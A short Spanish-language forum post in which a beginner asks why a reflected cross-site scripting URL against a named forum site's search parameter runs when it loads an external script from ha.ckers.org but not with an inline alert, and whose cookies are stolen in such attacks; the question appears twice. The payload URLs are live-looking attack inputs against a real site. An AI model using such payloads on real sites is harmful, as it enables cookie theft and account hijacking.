Recien estoy aprendiendo estoy y leyendo algunos papers, tengo unas dudas..
1) porque esto SI se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>
y esto NO se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>
2) cuando se roban cookies... son cookies de la pagina vulnerable o no?
Gracias.
1) porque esto SI se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script%20src=http://ha.ckers.org/xss.js></script>
y esto NO se ejecuta:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<script>alert("XSS")</script>
2) cuando se roban cookies... son cookies de la pagina vulnerable o no?
Gracias.